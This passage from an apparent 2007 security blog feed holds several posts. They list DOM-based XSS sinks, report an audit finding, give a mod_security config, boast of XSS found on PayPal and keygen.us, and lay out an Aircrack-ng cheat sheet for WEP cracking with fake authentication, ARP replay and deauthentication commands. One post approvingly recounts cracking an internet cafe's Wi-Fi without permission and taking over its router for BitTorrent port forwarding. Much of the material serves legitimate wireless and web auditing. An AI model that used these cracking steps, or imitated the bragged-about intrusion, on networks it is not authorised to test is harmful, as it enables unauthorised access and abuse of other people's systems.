/&gt;&lt;br /&gt;Write raw HTML, e.g.:&lt;br /&gt;document.write(…)&lt;br /&gt;document.writeln(…)&lt;br /&gt;document.body.innerHtml=…&lt;br /&gt;Directly modifying the DOM (including DHTML events), e.g.:&lt;br /&gt;document.forms[0].action=… (and various other collections)&lt;br /&gt;document.attachEvent(…)&lt;br /&gt;document.create…(…)&lt;br /&gt;document.execCommand(…)&lt;br /&gt;document.body. 
… (accessing the DOM through the body object)&lt;br /&gt;window.attachEvent(…)&lt;br /&gt;Replacing the document URL, e.g.:&lt;br /&gt;document.location=… (and assigning to location’s href, host and hostname)&lt;br /&gt;document.location.hostname=…&lt;br /&gt;document.location.replace(…)&lt;br /&gt;document.location.assign(…)&lt;br /&gt;document.URL=…&lt;br /&gt;window.navigate(…)&lt;br /&gt;Opening/modifying a window, e.g.:&lt;br /&gt;document.open(…)&lt;br /&gt;window.open(…)&lt;br /&gt;window.location.href=… (and assigning to location’s href, host and hostname)&lt;br /&gt;Directly executing script, e.g.:&lt;br /&gt;eval(…)&lt;br /&gt;window.execScript(…)&lt;br /&gt;window.setInterval(…)&lt;br /&gt;window.setTimeout(…)&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-9180123455453391155?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/9180123455453391155/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=9180123455453391155' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9180123455453391155'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/9180123455453391155'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/dom-based-xss.html' title='DOM Based XSS'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-5054739507812686305</id><published>2007-11-16T08:33:00.001+08:00</published><updated>2007-11-16T09:36:25.686+08:00</updated><title type='text'>Deadly execution in huge Financial Company</title><content type='html'>I was auditing one of the biggest financial companies in the world and here in the Singapore branch, it was just really bad. I was playing around with the software and noticed an upload function. With evil thoughts in my mind, I quickly wanted to see if this application does allow uploading of exe, bat or some other executable files. To my wildest surprise, it does allow the uploading of exe files and I tell you, I could upload any sort of trojan or virus and execute it on the client's PC. I actually did upload an exe program and tried to execute it on the client's PC and it did execute the program accordingly and smoothly with no protection on the client's PC. It was really just bad. Moreover, the application itself also allows command execution via the query string, which was really an eye opener. It was just a lucky day for my audit and an unlucky day for the customer. The report has been submitted and let's hope they will rectify the problem to avoid any attacks. 
&lt;br /&gt;&lt;br /&gt;Check out my next post on a Two Factor Authentication Man in the Middle attack PoC&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-5054739507812686305?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/5054739507812686305/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=5054739507812686305' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5054739507812686305'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/5054739507812686305'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/deadly-execution-in-huge-financial.html' title='Deadly execution in huge Financial Company'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4628397501588199598</id><published>2007-11-15T09:15:00.000+08:00</published><updated>2007-11-15T09:31:36.205+08:00</updated><title type='text'>Basics of Mod_Security</title><content type='html'>This past week, I was auditing a customer's web server defence against web attacks and I realised that they had not installed mod_security as one of the modules on the server. Well, considering it is a huge customer, they should at least do some basic filtering using mod_security since their servers are running on Linux. 
I mentioned mod_security in my previous post and for those who are still not sure what it is, mod_security is a web application firewall, an Apache web server add-on module that provides intrusion detection, content filtering, and web-based attack protection. It is good at detecting and stopping many known web attacks, such as many SQL injection type attacks, cross-site scripting, directory traversal type attacks, and many others. Below is a snippet of a simple, basic mod_security configuration:&lt;br /&gt;&lt;br /&gt;&lt;IfModule mod_security.c&gt;&lt;br /&gt;# Turn the filtering engine On or Off&lt;br /&gt;SecFilterEngine On&lt;br /&gt;&lt;br /&gt;# Make sure that URL encoding is valid&lt;br /&gt;SecFilterCheckURLEncoding On&lt;br /&gt;&lt;br /&gt;# Unicode encoding check&lt;br /&gt;SecFilterCheckUnicodeEncoding On&lt;br /&gt;&lt;br /&gt;# Only allow bytes from this range&lt;br /&gt;SecFilterForceByteRange 0 255&lt;br /&gt;&lt;br /&gt;# Only log actionable requests&lt;br /&gt;SecAuditEngine RelevantOnly&lt;br /&gt;&lt;br /&gt;# The name of the audit log file&lt;br /&gt;SecAuditLog /var/log/apache2/audit_log&lt;br /&gt;&lt;br /&gt;# Debug level set to a minimum&lt;br /&gt;SecFilterDebugLog /var/log/apache2/modsec_debug_log&lt;br /&gt;SecFilterDebugLevel 2&lt;br /&gt;&lt;br /&gt;# Should mod_security inspect POST payloads&lt;br /&gt;SecFilterScanPOST On&lt;br /&gt;&lt;br /&gt;# By default log and deny suspicious requests&lt;br /&gt;# with HTTP status 500&lt;br /&gt;SecFilterDefaultAction "deny,log,status:500"&lt;br /&gt;&lt;br /&gt;# Add custom secfilter rules here&lt;br /&gt;&lt;/IfModule&gt;&lt;br /&gt;&lt;br /&gt;Of course, you can add more items, depending on what you need it to filter and protect. Mod_Security does come with a performance cost; however, the security benefits far outweigh the performance cost. 
Do consider using it.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4628397501588199598?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4628397501588199598/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4628397501588199598' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4628397501588199598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4628397501588199598'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/basics-of-modsecurity.html' title='Basics of Mod_Security'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-300728938894504204</id><published>2007-11-15T00:39:00.000+08:00</published><updated>2007-11-15T00:47:34.407+08:00</updated><title type='text'>No hacking activites</title><content type='html'>Been really busy with all the results I got from my projects and pretty occupied with report writing. I am handling a few projects currently and, well, there ain't any time for me to research or perform any sorta testing or hacking. This is good in the sense that it keeps me busy and at least I feel "useful" to my company, in the sense that I am performing audits for our customers during this peak period. 
I will definitely resume hacking mode soon, so check back for more cool ill street hacking. As of now, I am still writing long unfinished reports, and they keep piling up if I don't start on them. Till then, stay tuned for my next installment.&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-300728938894504204?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/300728938894504204/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=300728938894504204' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/300728938894504204'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/300728938894504204'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/no-hacking-activites.html' title='No hacking activites'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4218753537885892964</id><published>2007-11-05T22:21:00.000+08:00</published><updated>2007-11-05T22:36:53.663+08:00</updated><title type='text'>SAP hacking Oracle?????</title><content type='html'>This is one of the biggest pieces of news I have ever heard: SAP hacking ORACLE. That is totally shocking but at the same time funny. Big organizations are fighting and competing with each other to secure their position in the software market. 
I am for once happy that SAP got into trouble. Well, the news is spreading like fire over the internet. Check out two of the sites below, and of course you can google for more.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.theinquirer.net/en/inquirer/news/2007/07/03/red-faced-sap-admits-hacking-oracle"&gt;http://www.theinquirer.net/en/inquirer/news/2007/07/03/red-faced-sap-admits-hacking-oracle&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blogs.zdnet.com/threatchaos/?p=450"&gt;http://blogs.zdnet.com/threatchaos/?p=450&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/Ry8qXoEF9lI/AAAAAAAAAfo/pROf9GgKD_0/s1600-h/fucked+sap.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/Ry8qXoEF9lI/AAAAAAAAAfo/pROf9GgKD_0/s400/fucked+sap.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5129365085978228306" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4218753537885892964?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4218753537885892964/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4218753537885892964' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4218753537885892964'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4218753537885892964'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/sap-hacking-oracle.html' title='SAP hacking 
Oracle?????'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/Ry8qXoEF9lI/AAAAAAAAAfo/pROf9GgKD_0/s72-c/fucked+sap.gif' height='72' width='72'/><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-4563504345540748522</id><published>2007-11-02T20:27:00.000+08:00</published><updated>2007-11-02T20:51:51.521+08:00</updated><title type='text'>keygen.us XSS</title><content type='html'>I was again playing around with XSS, this time on one of the biggest cracking sites, keygen.us. Well, I tried some basic XSS and it didn't work, as they did some input validation and escaped my input characters. It got me pumped up and I wanted an XSS on their site. In the end, with a bit of help I managed to get an XSS on their site, and one of them includes mario's exploit. It was an overall learning experience for me and an exciting one. 
Check it out:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RysdRoEF9kI/AAAAAAAAAfg/9OQLS5aVWOQ/s1600-h/keygen+xss.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RysdRoEF9kI/AAAAAAAAAfg/9OQLS5aVWOQ/s400/keygen+xss.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5128224789341009474" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RysdIoEF9jI/AAAAAAAAAfY/03drGjAEBQ4/s1600-h/fucked.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RysdIoEF9jI/AAAAAAAAAfY/03drGjAEBQ4/s400/fucked.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5128224634722186802" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-4563504345540748522?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/4563504345540748522/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=4563504345540748522' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4563504345540748522'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/4563504345540748522'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/keygenus-xss.html' title='keygen.us XSS'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/RysdRoEF9kI/AAAAAAAAAfg/9OQLS5aVWOQ/s72-c/keygen+xss.JPG' height='72' width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6000774827862336314</id><published>2007-11-01T14:09:00.000+08:00</published><updated>2007-11-01T14:24:19.967+08:00</updated><title type='text'>Paypal CRMgateway XSS</title><content type='html'>Paypal used to suffer a lot from phishing attacks in the past, and I bet even today the bad guys are finding ways to exploit this hole to get more money. I was again playing around and I managed to find an XSS hole in paypal's crmgateway. Well, it seems like paypal never learned their lesson in the past and still allows injections. Anyway, I had already cancelled my account with paypal because of their bad service and the unforgivable mistake they made. Good luck paypal.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp0.blogger.com/_Zx8XWzC_KPQ/RylvVIEF9iI/AAAAAAAAAfQ/b4cgIAWJBcM/s1600-h/paypal.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp0.blogger.com/_Zx8XWzC_KPQ/RylvVIEF9iI/AAAAAAAAAfQ/b4cgIAWJBcM/s400/paypal.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5127752059470607906" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6000774827862336314?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6000774827862336314/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6000774827862336314' title='19 Comments'/><link 
rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6000774827862336314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6000774827862336314'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/paypal-crmgateway-xss.html' title='Paypal CRMgateway XSS'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_Zx8XWzC_KPQ/RylvVIEF9iI/AAAAAAAAAfQ/b4cgIAWJBcM/s72-c/paypal.JPG' height='72' width='72'/><thr:total>19</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-3403603383334591347</id><published>2007-11-01T01:08:00.000+08:00</published><updated>2007-11-01T01:15:33.849+08:00</updated><title type='text'>Hacking and Cracking Wireless</title><content type='html'>One day after intruding into the router, I remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands; it comes in very handy when doing a wireless audit and saves you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;install madwifi-ng driver (done! monitor mode working)&lt;br /&gt;install rt73 driver for dlink usb (done! 
monitor mode working)&lt;br /&gt;install rtutilt for rausb0 configuration&lt;br /&gt;install aircrack-ng (done dev version from svn)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Steps:&lt;br /&gt;&lt;br /&gt;#####################################################&lt;br /&gt;CONFIGURATION:&lt;br /&gt;&lt;br /&gt;D-Link DWL-G122&lt;br /&gt;&lt;br /&gt;ifconfig rausb0 up&lt;br /&gt;iwpriv rausb0 forceprism 1&lt;br /&gt;iwpriv rausb0 rfmontx 1&lt;br /&gt;iwconfig rausb0 mode monitor OR&lt;br /&gt;airmon-ng start rausb0 channel&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;NetGear WG511T&lt;br /&gt;&lt;br /&gt;wlanconfig ath0 destroy&lt;br /&gt;wlanconfig ath0 create wlandev wifi0 wlanmode monitor&lt;br /&gt;&lt;br /&gt;specify channel&lt;br /&gt;iwconfig ath0 channel n&lt;br /&gt;########################################################&lt;br /&gt;&lt;br /&gt;CHANGING MAC ADDRESS&lt;br /&gt;&lt;br /&gt;ifconfig ath0 down&lt;br /&gt;ifconfig ath0 hw ether &lt;mac address&gt;&lt;br /&gt;ifconfig ath0 up&lt;br /&gt;&lt;br /&gt;use macchanger instead&lt;br /&gt;&lt;br /&gt;#########################################################&lt;br /&gt;&lt;br /&gt;INJECTION TESTING&lt;br /&gt;&lt;br /&gt;NetGear WG511T&lt;br /&gt;aireplay-ng -9&lt;br /&gt;===================&lt;br /&gt;D-Link DWL G122&lt;br /&gt;&lt;br /&gt;aireplay-ng -9 (if this doesn't work it means no ap on same channel found)&lt;br /&gt;Try card-to-card injection below:&lt;br /&gt;====================&lt;br /&gt;&lt;br /&gt;Card-To-Card Injection:&lt;br /&gt;Make sure they are on same channel using &lt;iwconfig device channel&gt; (channel hopping does not work on D-Link DWL G122???)&lt;br /&gt;iwlist &lt;device&gt; channel (to find out the current channel set)&lt;br /&gt;&lt;br /&gt;aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)&lt;br /&gt;aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)&lt;br /&gt;=====================&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br 
/&gt;########################################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PACKET CAPTURE:&lt;br /&gt;&lt;br /&gt;airodump-ng device (find out first the interested bssid and channel)&lt;br /&gt;&lt;br /&gt;Then capture packets on that particular channel:&lt;br /&gt;&lt;br /&gt;airodump-ng --channel &lt;ap channel&gt; --bssid &lt;ap mac address&gt; -w dumpfile device (ath0/rausb0)&lt;br /&gt;&lt;br /&gt;Notes: capture full packets when using PTW attack (don't dump ivs only)&lt;br /&gt;&lt;br /&gt;MERGING capture files (RESUMING)&lt;br /&gt;&lt;br /&gt;mergecap -w out.cap test1.cap test2.cap test3.cap&lt;br /&gt;&lt;br /&gt;FOR IVS&lt;br /&gt;&lt;br /&gt;use ivstools&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############################################################&lt;br /&gt;&lt;br /&gt;ATTACKS&lt;br /&gt;&lt;br /&gt;You may want to associate to ap first using fakeauth before any test&lt;br /&gt; aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0&lt;apmac&gt; -h 06:14:6c:4c:b9:7c&lt;yourmac&gt; ath0&lt;br /&gt;&lt;br /&gt;Automatic Association:&lt;br /&gt;aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ARP replay (for wep cracking PTW method):&lt;br /&gt;if RXQ in airodump window is &gt; 90 then #/s = 200+ (watch for #Data, it contains IV)&lt;br /&gt;&lt;br /&gt;aireplay-ng --arpreplay -b &lt;bssid&gt; -h &lt;mac address of any connected client&gt; device&lt;br /&gt;&lt;br /&gt;Deauthentication (to capture WPA handshake, reveal hidden SSID)&lt;br /&gt;Fake Authentication (to authenticate to AP in case needed before we can inject)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#############################################################&lt;br /&gt;WEP CRACKING &lt;br /&gt;&lt;br /&gt;Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)&lt;br /&gt;&lt;br /&gt;aircrack-ng -z -b &lt;bssid&gt; 
dumpfile*.cap &lt;br /&gt;40-bit = 20,000&lt;br /&gt;104-bit = 40,000&lt;br /&gt;&lt;br /&gt;Normal Attack &lt;br /&gt;-n 64 (test if 40-bit WEP) remove -n for 104-bit (default)&lt;br /&gt;aircrack-ng -n 64 -a 1 capturefile&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#########################################################&lt;br /&gt;&lt;br /&gt;RESOLVE MAC Address to IP Address&lt;br /&gt;&lt;br /&gt;use netdiscover or ARP tools&lt;br /&gt;&lt;br /&gt;##########################################################&lt;br /&gt;&lt;br /&gt;Determine the frequency on a particular channel&lt;br /&gt;http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#######################################################&lt;br /&gt;&lt;br /&gt;Increasing injection Speed&lt;br /&gt;&lt;br /&gt;iwconfig device rate 11M&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#####################################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-3403603383334591347?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/3403603383334591347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=3403603383334591347' title='14 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3403603383334591347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/3403603383334591347'/><link 
rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/11/hacking-and-cracking-wireless.html' title='Hacking and Cracking Wireless'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-6003231861477134664</id><published>2007-10-31T15:22:00.000+08:00</published><updated>2007-10-31T15:46:26.444+08:00</updated><title type='text'>Hacked into a Wireless Router.</title><content type='html'>These days, I am just mad crazy. Hacking, hacking and still hacking. Basically I am dead bored and decided to see how far I can go with my hacking skills. Today, after finishing auditing a customer, I wanted to check my email as I needed to send out an urgent email. I saw an internet cafe with a Wifi connection; however, there was encryption on. Within a few minutes, I managed to crack their password and hacked straight into their router. With that, I managed to use BitTorrent to do port forwarding and download my favourite TV show. Well, it wasn't as thrilling as the first time I hacked into a wireless router, but still, it was a hack. How did I do it? 
Just by observation and some trial and error and there you go.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://bp2.blogger.com/_Zx8XWzC_KPQ/Rygyt4EF9hI/AAAAAAAAAfI/wNhxiGHWtdM/s1600-h/hacked+wireless+router.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_Zx8XWzC_KPQ/Rygyt4EF9hI/AAAAAAAAAfI/wNhxiGHWtdM/s400/hacked+wireless+router.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5127403939486365202" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-6003231861477134664?l=hackathology.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackathology.blogspot.com/feeds/6003231861477134664/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2673681754036568683&amp;postID=6003231861477134664' title='14 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6003231861477134664'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2673681754036568683/posts/default/6003231861477134664'/><link rel='alternate' type='text/html' href='http://hackathology.blogspot.com/2007/10/hacked-into-wireless-router.html' title='Hacked into a Wireless Router.'/><author><name>Ronald</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_Zx8XWzC_KPQ/Rygyt4EF9hI/AAAAAAAAAfI/wNhxiGHWtdM/s72-c/hacked+wireless+router.JPG' height='72' 
width='72'/><thr:total>14</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2673681754036568683.post-2429153711923700052</id><published>2007-10-31T09:52:00.000+08:00</published><updated>2007-10-31T09:56:30.212+08:00</updated><title type='text'>Web Application Security with Joe Walker</title><content type='html'>This is a great slideshare from Joe Walker with all the new hacking techniques that involve Ajax and Web 2.0. Its content is simple yet very entertaining and easily understandable. Check it out, guys:&lt;br /&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_147905"&gt;&lt;object style="margin:0px" height="355" width="425"&gt;&lt;param name="movie" value="http://s3.amazonaws.com/slideshare/ssplayer2.swf?doc=web-app-security-1193579768112939-1"/&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://s3.amazonaws.com/slideshare/ssplayer2.swf?doc=web-app-security-1193579768112939-1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;&lt;a href="http://www.slideshare.net/?src=embed"&gt;&lt;img src="http://s3.amazonaws.com/slideshare/logo_embd.png" style="border:0px none;margin-top:-5px" alt="SlideShare"/&gt;&lt;/a&gt; | &lt;a href="http://slideshare.net/joewalker/web-app-security" title="View this slideshow on SlideShare"&gt;View&lt;/a&gt; | &lt;a href="http://www.slideshare.net/upload"&gt;Upload your own&lt;/a&gt;&lt;/div&gt;&lt;/div&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://getahead.org/blog/joe/"&gt;http://getahead.org/blog/joe/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The Hacka Man&lt;div class="blogger-post-footer"&gt;The Hacka Man&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2673681754036568683-2429153711923700052?l=hackathology.blogspot.com' 
